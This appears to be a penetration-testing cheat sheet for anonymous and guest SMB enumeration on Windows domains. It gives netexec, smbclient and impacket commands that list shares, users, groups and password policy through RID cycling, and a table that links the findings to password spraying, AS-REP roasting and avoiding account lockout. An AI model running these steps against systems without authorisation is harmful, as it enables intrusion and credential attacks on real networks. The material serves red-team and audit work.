#Attack Flow
plain text
Anonymous/guest SMB connect → IPC$ access → Enumerate shares/users/groups/policy
→ Feed usernames into spraying / AS-REP roasting / Kerbrute
#Check for Null Session / Guest Access
bash
nxc smb <target-ip> -u '' -p ''
nxc smb <target-ip> -u 'guest' -p ''
# Sweep subnet
nxc smb 10.1.10.0/24 -u '' -p ''
nxc smb 10.1.10.0/24 -u 'guest' -p ''
#Enumerate Shares
bash
nxc smb <target-ip> -u '' -p '' --shares
nxc smb <target-ip> -u 'guest' -p '' --shares
smbclient \\\\<target-ip>\\<share-name> -N
smbclient -L <target-ip> -N
#Enumerate Users and Groups
bash
nxc smb <target-ip> -u '' -p '' --users
nxc smb <target-ip> -u '' -p '' --groups
# RID cycling — works even when direct enum is blocked
nxc smb <target-ip> -u '' -p '' --rid-brute
impacket-lookupsid <domain>/<username>@<target-ip> -no-pass
#Enumerate Password Policy
bash
nxc smb <target-ip> -u '' -p '' --pass-pol
#What Each Result Tells You
| Finding | Implication |
|---|
| Null session allowed | Full anonymous enumeration likely possible |
| Guest account active | Enumerate shares immediately |
| Shares visible | Check IT, backup, finance, scripts shares |
| Users enumerated | Feed into Kerbrute, AS-REP roasting, spraying |
| Lockout threshold 0 | No lockout — spraying safe |
| Lockout threshold 3-5 | Spray carefully — one attempt per user per window |